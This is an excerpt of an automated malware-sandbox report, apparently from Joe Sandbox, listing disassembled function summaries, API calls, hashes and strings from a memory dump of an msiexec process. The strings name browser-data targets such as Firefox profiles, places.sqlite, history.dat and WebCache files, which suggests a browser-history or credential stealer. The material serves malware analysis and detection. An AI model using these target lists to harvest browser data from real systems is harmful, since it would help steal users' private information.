                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                    • free.MSVCRT ref: 0041848B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLastfree
                                                                    • String ID: |A
                                                                    • API String ID: 981974120-1717621600
                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 004033B7
                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                    • String ID: $0.@
                                                                    • API String ID: 2758756878-1896041820
                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2941347001-0
                                                                    • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                    • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403C09
                                                                    • memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscat$wcscpywcslen
                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                    • API String ID: 2489821370-1174173950
                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A824
                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 669240632-0
                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00414458
                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                    • String ID: "%s"
                                                                    • API String ID: 1343145685-3297466227
                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                    • API String ID: 1714573020-3385500049
                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004087D6
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                    • memset.MSVCRT ref: 00408828
                                                                    • memset.MSVCRT ref: 00408840
                                                                    • memset.MSVCRT ref: 00408858
                                                                    • memset.MSVCRT ref: 00408870
                                                                    • memset.MSVCRT ref: 00408888
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2911713577-0
                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 1475443563-3708268960
                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 1579243037-1578091866
                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E60F
                                                                    • memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Strings
                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                    • API String ID: 3354267031-2114579845
                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                    APIs
                                                                    Strings
                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                    • API String ID: 2221118986-1725073988
                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                    APIs
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$memcmp
                                                                    • String ID: $$8
                                                                    • API String ID: 2808797137-435121686
                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                    APIs
                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                    • String ID:
                                                                    • API String ID: 1979745280-0
                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                    APIs
                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    • memset.MSVCRT ref: 00414C87
                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcVersionmemsetwcscpy
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 4182280571-2036018995
                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                    APIs
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                    • memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                    • String ID: history.dat$places.sqlite
                                                                    • API String ID: 2641622041-467022611
                                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                    APIs
                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 839530781-0
                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: *.*$index.dat
                                                                    • API String ID: 1974802433-2863569691
                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FilePointer
                                                                    • String ID:
                                                                    • API String ID: 1156039329-0
                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
